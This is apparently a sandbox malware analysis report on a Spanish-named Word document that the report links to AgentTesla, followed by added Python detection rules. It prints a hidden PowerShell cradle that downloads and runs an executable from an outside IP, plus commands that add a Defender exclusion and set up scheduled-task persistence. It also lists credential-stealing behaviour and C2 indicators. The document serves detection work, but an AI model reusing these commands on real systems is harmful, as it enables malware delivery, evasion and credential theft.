                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\task.exeProcess token adjusted: Debug
                    Source: C:\Users\user\AppData\Roaming\task.exeMemory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion:

                    Injects a PE file into a foreign process
                    Source: C:\Users\user\AppData\Roaming\task.exe | Memory written: C:\Users\user\AppData\Roaming\task.exe base: 400000 value starts with: 4D5A
                    Adds a directory exclusion to Windows Defender
                    Source: C:\Users\user\AppData\Roaming\task.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe" (2 occurrences)
                    Injects files into Windows application
                    Source: C:\Windows\System32\notepad.exe | Injected file: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT was created by C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                    Bypasses PowerShell execution policy
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://173.232.204.89/task.exe','C:\Users\user\AppData\Roaming\task.exe');Start-Process 'C:\Users\user\AppData\Roaming\task.exe'" (7 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\AppData\Roaming\task.exe "C:\Users\user\AppData\Roaming\task.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\SzfukVRF.exe"
                    Source: C:\Users\user\AppData\Roaming\task.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp"
                    Source: C:\Users\user\AppData\Roaming\task.exe | Process created: C:\Users\user\AppData\Roaming\task.exe C:\Users\user\AppData\Roaming\task.exe
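                    The process-creation lines above are the whole execution chain in order: Word spawns a hidden, policy-bypassing PowerShell that fetches task.exe over plain HTTP into %APPDATA% and starts it; task.exe adds a Defender exclusion for its persisted copy (the -ExclusionPath argument here is a file, not a directory), registers a scheduled task from an XML it wrote to %TEMP%, and relaunches itself as the target of the MZ write at base 0x400000 recorded under "Injects a PE file". Two details matter for detection: the cradle spells the scheme "httP://", which defeats case-sensitive string matches, and the 32-bit task.exe is logged launching SysWOW64\powershell.exe although its command line names the System32 path, because of WOW64 file system redirection. The Python below is an added example and not part of the sandbox report: each rule encodes one of these behaviours and runs over process events constructed from the command lines shown above; the event schema (parent_image, image, command_line) is an assumption to be mapped onto your EDR's fields.

```python
"""Detection rules for the execution chain recorded in this report.

Added example, not part of the original sandbox report. The event schema
below is an assumption; the sample events are constructed from the process
creation lines the report shows (quoting restored).
"""
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
USER_WRITABLE = re.compile(r"\\AppData\\(?:Roaming|Local)\\", re.I)


@dataclass(frozen=True)
class ProcEvent:  # assumed schema: map to your EDR's process-creation fields
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    """Compare on the file name only: a 32-bit parent under WOW64 is logged
    launching SysWOW64\\...\\powershell.exe while the command line still names
    the System32 path, so full-path matching would miss one of the two."""
    return path.rsplit("\\", 1)[-1].lower()


def office_spawns_script_host(ev: ProcEvent) -> bool:
    return basename(ev.parent_image) in OFFICE_IMAGES and basename(ev.image) in SCRIPT_HOSTS


def script_host_launches_user_dir_binary(ev: ProcEvent) -> bool:
    """A script host starting an executable it just wrote under %APPDATA%."""
    return basename(ev.parent_image) in SCRIPT_HOSTS and bool(USER_WRITABLE.search(ev.image))


# Case-insensitive on purpose: the cradle in this report writes 'httP://' and
# 'bypass' in mixed case to slip past case-sensitive string matching.
DOWNLOAD = re.compile(r"downloadfile|downloadstring|downloaddata|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)
EXECUTE = re.compile(r"start-process|\bsaps\b|invoke-expression|\biex\b|invoke-item", re.I)
# powershell.exe accepts -ExecutionPolicy, -ex and -ep; longest alternative first.
POLICY_BYPASS = re.compile(r"-(?:executionpolicy|exec|ex|ep)\s+(?:bypass|unrestricted)", re.I)
DEFENDER_EXCLUSION = re.compile(r"add-mppreference\b.*-exclusion(?:path|process|extension|ipaddress)", re.I)


def powershell_download_execute(ev: ProcEvent) -> bool:
    """Download cradle followed by execution in the same command line."""
    if basename(ev.image) not in {"powershell.exe", "pwsh.exe"}:
        return False
    return bool(DOWNLOAD.search(ev.command_line) and EXECUTE.search(ev.command_line))


def powershell_policy_bypass(ev: ProcEvent) -> bool:
    return basename(ev.image) in {"powershell.exe", "pwsh.exe"} and bool(POLICY_BYPASS.search(ev.command_line))


def defender_exclusion_added(ev: ProcEvent) -> bool:
    """-ExclusionPath takes a file or a directory; here it is the persisted copy."""
    return bool(DEFENDER_EXCLUSION.search(ev.command_line))


def schtasks_from_temp_xml(ev: ProcEvent) -> bool:
    """Task registered from an XML definition the dropper wrote under %TEMP%."""
    cl = ev.command_line.lower()
    return (basename(ev.image) == "schtasks.exe" and "/create" in cl and "/xml" in cl
            and bool(re.search(r"\\appdata\\local\\temp\\", cl)))


def self_relaunch_from_user_dir(ev: ProcEvent) -> bool:
    """A binary in a user-writable directory starting a second copy of itself,
    the usual prelude to hollowing the child with a different PE image."""
    return ev.parent_image.lower() == ev.image.lower() and bool(USER_WRITABLE.search(ev.image))


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("office_spawns_script_host", office_spawns_script_host),
    ("script_host_launches_user_dir_binary", script_host_launches_user_dir_binary),
    ("powershell_download_execute", powershell_download_execute),
    ("powershell_policy_bypass", powershell_policy_bypass),
    ("defender_exclusion_added", defender_exclusion_added),
    ("schtasks_from_temp_xml", schtasks_from_temp_xml),
    ("self_relaunch_from_user_dir", self_relaunch_from_user_dir),
]


def scan(events) -> List[Tuple[int, str]]:
    """Return (event index, rule name) for every rule each event trips."""
    return [(i, name) for i, ev in enumerate(events) for name, rule in RULES if rule(ev)]


# Constructed sample events, taken from the process-creation lines in this report.
PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
TASK = r"C:\Users\user\AppData\Roaming\task.exe"
DROP = r"C:\Users\user\AppData\Roaming\SzfukVRF.exe"
CRADLE = (f'"{PS64}" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '
          f'"(New-Object System.Net.WebClient).DownloadFile(\'httP://173.232.204.89/task.exe\',\'{TASK}\');'
          f'Start-Process \'{TASK}\'"')
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE", PS64, CRADLE),
    ProcEvent(PS64, TASK, f'"{TASK}"'),
    ProcEvent(TASK, PS32, f'"{PS64}" Add-MpPreference -ExclusionPath "{DROP}"'),
    ProcEvent(TASK, r"C:\Windows\SysWOW64\schtasks.exe",
              r'"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SzfukVRF" /XML "C:\Users\user\AppData\Local\Temp\tmpBA6A.tmp"'),
    ProcEvent(TASK, TASK, TASK),
    # Benign control: an admin one-liner launched from Explorer trips nothing.
    ProcEvent(r"C:\Windows\explorer.exe", PS64, f'"{PS64}" -NoProfile -Command Get-Process'),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {rule}")
```

                    Run stand-alone, the block prints one line per rule hit; every event from the report trips at least one rule and the benign control trips none. Matching on the image basename rather than the full path is what lets the rules fire on both the System32 and SysWOW64 PowerShell paths that appear in this report.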
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (15 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (6 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation (3 occurrences)
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation (3 occurrences)
                    Source: C:\Users\user\AppData\Roaming\task.exe | Queries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation (5 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation (2 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\hh.exe VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (2 occurrences)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 occurrences)
                    Source: C:\Users\user\AppData\Roaming\task.exe | Queries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Windows\System32\notepad.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\abdtfhghgeghDp .ScT VolumeInformation
                    Source: C:\Users\user\AppData\Roaming\task.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 14.0.task.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.33d4df8.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.339ebd8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.task.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.339ebd8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.33d4df8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini (2 occurrences)
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\AppData\Roaming\task.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: Yara match | File source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY

                    Remote Access Functionality:

                    Yara detected AgentTesla
                    Source: Yara match | File source: 14.0.task.exe.400000.11.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.13.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.33d4df8.5.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.339ebd8.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.7.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.2.task.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.339ebd8.6.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 14.0.task.exe.400000.9.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 9.2.task.exe.33d4df8.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000E.00000000.446276168.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.445141898.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.445754723.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000000.446674147.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705023862.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705737586.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000E.00000002.705804670.000000000240A000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: task.exe PID: 2780, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    Techniques the report maps to observed behaviour, listed by tactic. The number after each technique is the count shown beside it in the original matrix; matrix cells without a count (for example Valid Accounts or Modify System Partition) are unobserved placeholders and are omitted.

                    Initial Access: none observed
                    Execution: Windows Management Instrumentation (211); Scripting (3); Shared Modules (1); Exploitation for Client Execution (33); Command and Scripting Interpreter (13); Scheduled Task/Job (1); PowerShell (3)
                    Persistence: Scheduled Task/Job (1)
                    Privilege Escalation: Process Injection (211); Scheduled Task/Job (1)
                    Defense Evasion: Disable or Modify Tools (11); Deobfuscate/Decode Files or Information (1); Scripting (3); Obfuscated Files or Information (3); Software Packing (13); Masquerading (1); Virtualization/Sandbox Evasion (131); Process Injection (211)
                    Credential Access: OS Credential Dumping (2); Input Capture (11)
                    Discovery: File and Directory Discovery (2); System Information Discovery (114); Security Software Discovery (311); Process Discovery (1); Virtualization/Sandbox Evasion (131); Application Window Discovery (1); Remote System Discovery (1)
                    Lateral Movement: none observed
                    Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (11); Clipboard Data (1)
                    Exfiltration: none observed
                    Command and Control: Ingress Tool Transfer (12); Encrypted Channel (1); Non-Standard Port (1); Non-Application Layer Protocol (2); Application Layer Protocol (32)
                    Network Effects, Remote Service Effects, Impact: none observed

                    Behavior Graph

                    Behavior Graph ID: 528739 | Sample: PAGO DEL SALDO.doc | Start date: 25/11/2021 | Architecture: WINDOWS | Score: 100
                    Top-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Sigma detected: Powershell download and execute file; 19 other signatures

                    Process tree, with the files, network endpoints and signatures the graph attaches to each node:

                    WINWORD.EXE
                      Network: 173.232.204.89 (EONIX-COMMUNICATIONS-ASBLOCK-62904US, United States), ports 49167, 49168, 80
                      Dropped: C:\Users\user\AppData\Local\...\task[1].exe (PE32); C:\Users\user\AppData\...\abdtfhghgeghDp .ScT (data); C:\Users\user\AppData\Local\...\DD7EADD8.png (370)
                      Signatures: Document exploit detected (creates forbidden files); Suspicious powershell command line found; Tries to download and execute files (via powershell); Microsoft Office creates scripting files
                      Children: powershell.exe; notepad.exe; powershell.exe; 2 other processes
                      powershell.exe
                        Dropped: C:\Users\user\AppData\Roaming\task.exe (PE32)
                        Signatures: Powershell drops PE file
                        task.exe
                          Dropped: C:\Users\user\AppData\Roaming\SzfukVRF.exe (PE32); C:\Users\user\AppData\Local\...\tmpBA6A.tmp (XML)
                          Signatures: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Uses schtasks.exe or at.exe to add and modify task schedules; 2 other signatures
                          Children: task.exe; powershell.exe; schtasks.exe
                          task.exe
                            Network: 208.91.199.224 (PUBLIC-DOMAIN-REGISTRYUS, United States), ports 49173, 587; us2.smtp.mailhostbox.com 208.91.198.143 (PUBLIC-DOMAIN-REGISTRYUS, United States), ports 49169, 49170, 49171
                            Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Installs a global keyboard hook
                          powershell.exe
                          schtasks.exe
                      notepad.exe
                        Signatures: Injects files into Windows application
                      powershell.exe
                      2 other processes

                    Screenshots

                    Thumbnails


                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    No Antivirus matches

                    Dropped Files

                    No Antivirus matches

                    Unpacked PE Files

Source | Detection | Scanner | Label
14.0.task.exe.400000.13.unpack | 100% | Avira | TR/Spy.Gen8
14.0.task.exe.400000.5.unpack | 100% | Avira | TR/Spy.Gen8
14.0.task.exe.400000.11.unpack | 100% | Avira | TR/Spy.Gen8
14.0.task.exe.400000.7.unpack | 100% | Avira | TR/Spy.Gen8
14.2.task.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1143187
14.0.task.exe.400000.9.unpack | 100% | Avira | TR/Spy.Gen8

                    Domains

                    No Antivirus matches

                    URLs

Source | Detection | Scanner | Label
httP://173.232.2 | 0% | Avira URL Cloud | safe
httP://173.232.204.89/t | 0% | Avira URL Cloud | safe
http://java.lp | 0% | Avira URL Cloud | safe
http://173.232.204.89 | 0% | Avira URL Cloud | safe
httP://173.232.204.89/task.exePE | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
httP://173.232 | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://173.232.204.89/task.exe | 0% | Avira URL Cloud | safe
httP://173.232.204.89/task.ex | 0% | Avira URL Cloud | safe

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.198.143 | true | false | (none) | high

                      Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://173.232.204.89/task.exe | true | Avira URL Cloud: safe | unknown

                      URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
httP://173.232.2 | powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous | powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp | false | (none) | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp | false | (none) | high
httP://173.232.204.89/t | powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
http://java.lp | powershell.exe, 00000003.00000002.429782897.00000000001F9000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://173.232.204.89 | powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000003.00000002.438810509.0000000003839000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
httP://173.232.204.89/task.exePE | powershell.exe, 00000003.00000002.438371643.000000000373C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.piriform.com/ccleaner | powershell.exe, 00000005.00000002.424310853.00000000003AF000.00000004.00000020.sdmp | false | (none) | high
http://www.%s.comPA | powershell.exe, 00000003.00000002.432791776.0000000002300000.00000002.00020000.sdmp, powershell.exe, 00000005.00000002.424597897.0000000002340000.00000002.00020000.sdmp, task.exe, 00000009.00000002.449659723.0000000004E40000.00000002.00020000.sdmp | false | URL Reputation: safe | low
httP://173.232 | powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | low
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | task.exe, 00000009.00000002.448392775.000000000239B000.00000004.00000001.sdmp, task.exe, 00000009.00000002.448245282.00000000022AF000.00000004.00000001.sdmp | false | (none) | high
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | task.exe, 00000009.00000002.448684554.00000000032AD000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
httP://173.232.204.89/task.ex | powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp | true | Avira URL Cloud: safe | unknown
httP://173.232.204.89/task.exe | powershell.exe, 00000005.00000002.432486601.000000000370C000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.425635089.0000000002D8F000.00000004.00000001.sdmp | true | (none) | unknown

                                Contacted IPs


                                Public

IP | Domain | Country | ASN | ASN Name | Malicious
208.91.198.143 | us2.smtp.mailhostbox.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | false
208.91.199.224 | unknown | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
173.232.204.89 | unknown | United States | 62904 | EONIX-COMMUNICATIONS-ASBLOCK-62904US | true

                                General Information

Joe Sandbox Version: 34.0.0 Boulder Opal
Analysis ID: 528739
Start date: 25.11.2021
Start time: 18:20:30
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 10m 52s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: PAGO DEL SALDO.doc
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.expl.evad.winDOC@21/27@8/3
EGA Information: Failed
HDC Information: Failed
HCA Information:
• Successful, ratio: 93%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .doc
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
Warnings:
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
• TCP Packets have been reduced to 100
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateFile calls found.
• Report size getting too big, too many NtDeviceIoControlFile calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryAttributesFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                Simulations

                                Behavior and APIs

Time | Type | Description
18:21:21 | API Interceptor | 144x Sleep call for process: powershell.exe modified
18:21:29 | API Interceptor | 1177x Sleep call for process: task.exe modified
18:21:34 | API Interceptor | 1x Sleep call for process: schtasks.exe modified

                                Joe Sandbox View / Context

                                IPs

Match | Associated Sample Name / URL | Detection
208.91.198.143 | MT_1O1_SWIFt.doc | malicious
208.91.198.143 | Reconfirm The Details.doc | malicious
208.91.198.143 | Document.exe | malicious
208.91.198.143 | MT_101_SWIFT.doc | malicious
208.91.198.143 | Purchase Order PO#7701.exe | malicious
208.91.198.143 | TNT E-Invoice No 11073490.exe | malicious
208.91.198.143 | E invoice.exe | malicious
208.91.198.143 | UY2021 Ta-Ho Maritime Schedule.exe | malicious
208.91.198.143 | PNkBekAKOeQD1Jj.exe | malicious
208.91.198.143 | PRESUPUESTO.xlsx | malicious
208.91.198.143 | DHL Documentos de envio originales.exe | malicious
208.91.198.143 | XSsBxQH419.exe | malicious
208.91.198.143 | devis.xlsx | malicious
208.91.198.143 | Quotation- 306013SQ.exe | malicious
208.91.198.143 | PO 4601056018.exe | malicious
208.91.198.143 | Purchase Order Vale-60,000MT.exe | malicious
208.91.198.143 | BOQ 11745692.exe | malicious
208.91.198.143 | dhl_doc9548255382.exe | malicious
208.91.198.143 | ADYP_210913_100641_PAGOS_005539.xlsx | malicious
208.91.198.143 | Quotation.xlsx | malicious
208.91.199.224 | MT_1O1_SWIFt.doc | malicious
208.91.199.224 | Reconfirm The Details.doc | malicious
208.91.199.224 | Document.exe | malicious
208.91.199.224 | MT_101_SWIFT.doc | malicious
208.91.199.224 | ORDER INQUIRY-PVP-SP-2021-58.exe | malicious
208.91.199.224 | DOC221121.exe | malicious
208.91.199.224 | TOP QUOTATION RFQ 2021.exe | malicious
208.91.199.224 | AWB Number 0004318855.DOCX.exe | malicious
208.91.199.224 | Purchase Order.exe | malicious
208.91.199.224 | ORDER INQUIRY-PVP-SP-2021-56.exe | malicious
208.91.199.224 | PRESUPUESTO.xlsx | malicious
208.91.199.224 | vYeUxRnIbLKDudo.exe | malicious
208.91.199.224 | DHL Documentos de envio originales.exe | malicious
208.91.199.224 | pVLzns64XtYkuFT.exe | malicious
208.91.199.224 | BOQ 11745692.exe | malicious
208.91.199.224 | BOQ 11745692.exe | malicious
208.91.199.224 | ADYP_210913_100641_PAGOS_005539.xlsx | malicious
208.91.199.224 | gHs6ECUllmPgK2I.exe | malicious
208.91.199.224 | RFQ.exe | malicious
208.91.199.224 | IMG-4579876545676545676543.exe | malicious

                                                                                                                Domains

Match | Associated Sample Name / URL | Detection | Context
us2.smtp.mailhostbox.com | MT_1O1_SWIFt.doc | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Reconfirm The Details.doc | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | Document.exe | malicious | 208.91.198.143
us2.smtp.mailhostbox.com | MT_101_SWIFT.doc | malicious | 208.91.199.225
us2.smtp.mailhostbox.com | ORDER INQUIRY-PVP-SP-2021-58.exe | malicious | 208.91.199.224
us2.smtp.mailhostbox.com | DOC221121.exe | malicious | 208.91.199.224
